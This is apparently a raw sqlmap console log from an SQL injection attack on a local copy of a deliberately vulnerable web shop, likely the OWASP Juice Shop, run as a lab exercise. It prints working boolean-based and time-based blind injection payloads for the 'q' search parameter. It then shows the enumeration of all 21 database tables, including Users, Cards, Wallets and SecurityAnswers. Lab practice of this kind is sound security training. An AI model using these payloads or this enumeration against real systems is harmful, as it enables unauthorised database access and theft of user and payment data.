        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:55:20 /2025-09-15/

[16:55:20] [INFO] resuming back-end DBMS 'sqlite' 
[16:55:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: q (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=test%' AND 1556=1556 AND 'siIx%'='siIx

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: q=test%' AND 1098=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'plqG%'='plqG
---
[16:55:20] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[16:55:20] [INFO] fetching tables for database: 'SQLite_masterdb'
[16:55:20] [INFO] fetching number of tables for database 'SQLite_masterdb'
[16:55:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[16:55:20] [INFO] retrieved: 21

[16:55:20] [INFO] retrieved: Users

[16:55:21] [INFO] retrieved: sqlite_sequence

[16:55:23] [INFO] retrieved: Addresses

[16:55:24] [INFO] retrieved: Baskets

[16:55:25] [INFO] retrieved: Products

[16:55:26] [INFO] retrieved: BasketItems

[16:55:27] [INFO] retrieved: Captchas

[16:55:29] [INFO] retrieved: Cards

[16:55:29] [INFO] retrieved: Challenges

[16:55:30] [INFO] retrieved: Complaints

[16:55:31] [INFO] retrieved: Deliveries

[16:55:33] [INFO] retrieved: Feedbacks

[16:55:34] [INFO] retrieved: Hints

[16:55:35] [INFO] retrieved: ImageCaptchas

[16:55:36] [INFO] retrieved: Memories

[16:55:38] [INFO] retrieved: PrivacyRequests

[16:55:40] [INFO] retrieved: Quantities

[16:55:41] [INFO] retrieved: Recycles

[16:55:42] [INFO] retrieved: SecurityQuestions

[16:55:44] [INFO] retrieved: SecurityAnswers

[16:55:46] [INFO] retrieved: Wallets
<current>
[21 tables]
+-------------------+
| Addresses         |
| BasketItems       |
| Baskets           |
| Captchas          |
| Cards             |
| Challenges        |
| Complaints        |
| Deliveries        |
| Feedbacks         |
| Hints             |
| ImageCaptchas     |
| Memories          |
| PrivacyRequests   |
| Products          |
| Quantities        |
| Recycles          |
| SecurityAnswers   |
| SecurityQuestions |
| Users             |
| Wallets           |
| sqlite_sequence   |
+-------------------+

[16:55:47] [INFO] fetched data logged to text files under '/home/lucifer/.local/share/sqlmap/output/localhost'

[*] ending @ 16:55:47 /2025-09-15/

